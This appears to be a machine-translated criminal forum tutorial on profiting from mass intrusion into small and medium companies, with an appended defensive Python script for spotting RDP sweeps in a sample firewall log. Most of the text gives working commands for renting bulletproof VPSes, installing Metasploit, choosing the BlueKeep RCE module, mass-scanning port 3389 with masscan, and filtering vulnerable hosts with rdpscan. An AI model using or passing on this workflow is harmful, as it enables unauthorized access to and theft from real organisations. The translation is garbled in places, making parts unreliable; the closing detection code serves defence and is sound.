How to earn from 1k to 100k bucks in a month with almost no investment
Today I will tell you how to become a welder with practically no investment.
We will mine entry points to small and medium-sized companies, using metasploit while investing 100 bucks in the purchase of only 2 x vps
What you need:
2 vps servers on Ubuntu (preferably bulletproof top configuration will not be needed, so 100 bucks should be enough for you)
P.S. You can take any other OS; I will describe the setup on Ubuntu.
Intro initial vps setup for working with meta
We have a clean ubuntu
We will cover xrdp + the xfce shell (for me it is more convenient; you can also interact with the server over ssh)
Update packages
sudo apt-get update
Let's roll xrdp to work through terminal sessions
sudo apt-get install xrdp
Install the xfce shell, you can put mate, for example (but xfce works the most stable with terminal servers)
sudo apt-get install xfce4 xfce4-terminal
Let xrdp use this shell
sudo sed -i.bak '/fi/a #xrdp multiple users configuration n xfce-session n' /etc/xrdp/startwm.sh
Turn on xrdp
Soryan wrote punctuation and syntax grammar errors on the column without editing anything, if someone wants to add or record a video on this topic, throw 50-100 bucks for motivation)
sudo systemctl enable xrdp
Done now you can work with the server through a terminal session
We will install a convenient text editor, gedit
sudo apt-get install gedit
htop to monitor the system load
sudo apt-get install htop
Install metasploit, we will not pull the database to it, we will not need to
download the metasploit curl or
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
give wget permission chmod 755 msfinstall
sudo ./msfinstall
Now when you type msfconsole in the shell, the metasploit will start.
II choice of RCE and preparation of the material
We will get our bread from this vulnerability
https://en.wikipedia.org/wiki/BlueKeep
in the metasploit there is an rce for it
exploit/windows/rdp/cve_2019_0708_bluekeep_rce
This rce for the rdp protocol is extremely unstable, but brings good access)
With RCE we decided
now we need material, that is, vulnerable machines in the clearnet for Bluekeep
Ideally, if you have subnets with maxmaind and software for penetration testing from z668, it is needed exclusively for checking the RDP service so as not to waste time and miss ports everything that is not related to rdp is
best to scan random TCP ports and then check them for the rdp service
I'll show you using the standard 3389 port as an example
Install 2 more software for port scanning (masscan) and rdpscan to check for an active bluekeep
we put everything necessary for the operation of the masscan we sudo apt-get install git gcc make libpcap-dev
tighten the sorts to ourselves git clone https://github.com/robertdavidgraham/masscan
go to the directory with the masscan cd masscan we
collect in a multi- stream make -j
Download for free or buy IP addresses depots
masscan -iL ip.txt -oL res4.txt -p 3389 --rate 100000 --exclude 255.255.255.255
these parameters will take depots faila res4.txt scan the port 3389 with Reith 100,000 excluding 255.255.255.255 subnet
awk '{ print $4,$3 }' OFS=":" res4.txt > 4433.txt
will give clean results with IP output faila masskana
Put scanner vulnerability blyukip and everything necessary for its work compile scanner Launch --workers 500 (the number of workers` worth otpisalnoe number depends on your server config)
sudo apt-get install libssl-dev
sudo apt-get install build-essential
git clone https://github.com/robertdavidgraham/rdpscan.git
cd /rdpscan/
make -j
./rdpscan --workers 500 --port 3389 --file /root/rdpscan/ch2.txt grep 'VULN' | cut -f1 -d'-' >results.txt
--port 3389 the port to scan
--file /root/rdpscan/ch2.txt path to the file with
grep 'VULN' types, select only vulnerable ones and write to the file> results.txt
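Seen from the receiving network, the port 3389 sweep described above shows up as one source touching many distinct hosts within seconds. The following is an added example, not part of the original post: detection logic run over a constructed firewall log (the log format, the addresses and the thresholds are assumptions), which also lists the hosts that accepted the connection and therefore need RDP closed off or patched first.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample firewall log: "<timestamp> <src> <dst> <dst_port> <action>"
SAMPLE_LOG = """\
2024-05-01T10:00:00 198.51.100.7 203.0.113.1 3389 DENY
2024-05-01T10:00:00 198.51.100.7 203.0.113.2 3389 DENY
2024-05-01T10:00:00 198.51.100.7 203.0.113.3 3389 ALLOW
2024-05-01T10:00:01 198.51.100.7 203.0.113.4 3389 DENY
2024-05-01T10:00:01 198.51.100.7 203.0.113.5 3389 DENY
2024-05-01T10:00:01 198.51.100.7 203.0.113.6 3389 DENY
2024-05-01T10:00:02 192.0.2.20 203.0.113.3 3389 ALLOW
2024-05-01T09:00:00 192.0.2.30 203.0.113.1 3389 DENY
2024-05-01T11:00:00 192.0.2.30 203.0.113.2 3389 DENY
2024-05-01T13:00:00 192.0.2.30 203.0.113.3 3389 DENY
truncated line
"""

def find_rdp_sweeps(log_text, port=3389, min_targets=5,
                    window=timedelta(seconds=10)):
    """Flag sources hitting >= min_targets distinct hosts on `port` in one window."""
    hits = defaultdict(list)       # src -> [(time, dst)]
    exposed = defaultdict(set)     # src -> {dst that answered ALLOW}
    for line in log_text.splitlines():
        try:
            ts, src, dst, dport, action = line.split()
            when, dport = datetime.fromisoformat(ts), int(dport)
        except ValueError:
            continue               # malformed or truncated line
        if dport != port:
            continue
        hits[src].append((when, dst))
        if action == "ALLOW":
            exposed[src].add(dst)
    flagged = {}
    for src, events in hits.items():
        events.sort()
        start, best, in_window = 0, 0, defaultdict(int)
        for when, dst in events:
            in_window[dst] += 1
            while when - events[start][0] > window:   # expire old events
                old = events[start][1]
                in_window[old] -= 1
                if not in_window[old]:
                    del in_window[old]
                start += 1
            best = max(best, len(in_window))
        if best >= min_targets:
            flagged[src] = {"targets": best, "exposed": sorted(exposed[src])}
    return flagged
```

A single administrator reconnecting to one host and a source whose probes are hours apart both stay below the threshold; only the burst across distinct hosts is reported.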